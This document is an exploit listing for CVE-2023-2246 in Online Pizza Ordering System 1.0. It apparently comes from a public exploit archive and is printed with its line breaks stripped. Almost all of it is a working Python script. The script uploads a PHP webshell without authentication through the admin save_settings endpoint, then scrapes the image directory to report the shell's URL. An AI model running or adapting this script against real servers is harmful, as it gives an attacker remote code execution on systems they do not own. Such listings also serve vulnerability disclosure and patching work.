Online Pizza Ordering System 1.0 Shell Upload

# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload# Date: 03/05/2023# Exploit Author: URGAN # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: v1.0# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 # CVE: CVE-2023-2246#!/usr/bin/env python3# coding: utf-8import osimport requestsimport argparsefrom bs4 import BeautifulSoup# command line argumentsparser = argparse.ArgumentParser()parser.add_argument('-u', '--url', type=str, help='URL with http://')parser.add_argument('-p', '--payload', type=str, help='PHP webshell')args = parser.parse_args()# if no arguments are passed, ask the user for themif not (args.url and args.payload):    args.url = input('Enter URL with http://: ')    args.payload = input('Enter file path PHP webshell: ')# URL Variablesurl = args.url + '/admin/ajax.php?action=save_settings'img_url = args.url + '/assets/img/'filename = os.path.basename(args.payload)files = [  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]# send a POST request to the serverresp_upl = requests.post(url, files = files)status_code = resp_upl.status_codeif status_code == 200:    print('[+] File uploaded')else:    print(f'[-] Error {status_code}: {resp_upl.text}')    raise SystemExit(f'[-] Script stopped due to error {status_code}.')# send a GET request to the serverresp_find = requests.get(img_url)# Use BeautifulSoup to parse the page's HTML codesoup = BeautifulSoup(resp_find.text, 'html.parser')# get all <a> tags on a pagelinks = soup.find_all('a')# list to store found filesfound_files = []# we go through all the links and look for the desired file by its namefor link in links:    file_upl = link.get('href')    if file_upl.endswith(filename): # uploaded file name        print('[+] Uploaded file found:', file_upl)        file_url = img_url + file_upl # get the full URL of your file        found_files.append(file_url) # add the file to the list of found files# if the list is not empty, then display all found filesif found_files:    print('[+] Full URL of your file:')    for file_url in found_files:        print('[+] ' + file_url)else:    print('[-] File not found')